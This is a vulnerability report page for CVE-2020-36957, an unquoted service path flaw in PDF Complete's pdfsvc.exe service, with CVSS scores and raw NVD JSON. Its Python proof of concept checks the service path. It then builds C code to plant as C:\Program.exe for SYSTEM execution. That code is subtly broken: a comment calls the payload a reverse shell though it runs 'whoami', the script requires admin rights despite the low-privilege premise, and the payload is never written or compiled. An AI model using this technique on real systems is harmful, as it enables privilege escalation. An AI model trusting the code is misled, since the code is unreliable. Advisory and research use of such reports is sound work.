Security Vulnerability Report
中文
CVE-2020-36957 CVSS 7.8 HIGH

CVE-2020-36957

Published: 2026-01-26 18:16:26
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

PDF Complete 3.5.310.2002 contains an unquoted service path vulnerability in its pdfsvc.exe service configuration. Attackers can exploit the unquoted path to inject and execute malicious code with elevated LocalSystem privileges.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PDF Complete < 3.5.310.2002
PDF Complete 3.5.310.2002

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2020-36957 PoC - PDF Complete Unquoted Service Path # This script demonstrates the unquoted service path vulnerability in pdfsvc.exe import os import sys import subprocess import ctypes def is_admin(): """Check if running with administrator privileges""" try: return ctypes.windll.shell32.IsUserAnAdmin() except: return False def check_service_path(): """Check if pdfsvc.exe service has unquoted path""" try: result = subprocess.run( ['sc', 'qc', 'pdfsvc'], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: print("[+] Service pdfsvc found") if '"' not in result.stdout.split('BINARY_PATH_NAME')[1].split('\n')[0]: print("[!] Service path is unquoted - Vulnerable!") return True else: print("[-] Service path is quoted - Not vulnerable") return False except Exception as e: print(f"[-] Error checking service: {e}") return False def exploit(): """Generate malicious executable for path hijacking""" if not is_admin(): print("[-] This exploit requires administrator privileges") return False if not check_service_path(): return False # Malicious payload - creates reverse shell malicious_code = ''' #include <windows.h> #include <stdio.h> int main() {{ STARTUPINFO si; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi)); si.cb = sizeof(si); // Replace with actual payload char* cmd = "cmd.exe /c whoami > C:\\\\poc_result.txt"; CreateProcess(NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); return 0; }} ''' print("[+] Payload generated - Compile and place as C:\\Program.exe") print("[+] Then restart the pdfsvc service to trigger execution") return True if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36957", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:26.490", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "PDF Complete 3.5.310.2002 contains an unquoted service path vulnerability in its pdfsvc.exe service configuration. Attackers can exploit the unquoted path to inject and execute malicious code with elevated LocalSystem privileges."}, {"lang": "es", "value": "PDF Complete 3.5.310.2002 contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración de su servicio pdfsvc.exe. Los atacantes pueden explotar la ruta sin comillas para inyectar y ejecutar código malicioso con privilegios elevados de LocalSystem."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://pdf-complete.informer.com/3.5/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49226", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/pdf-complete-pdfsvcexe-unquoted-service-path", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.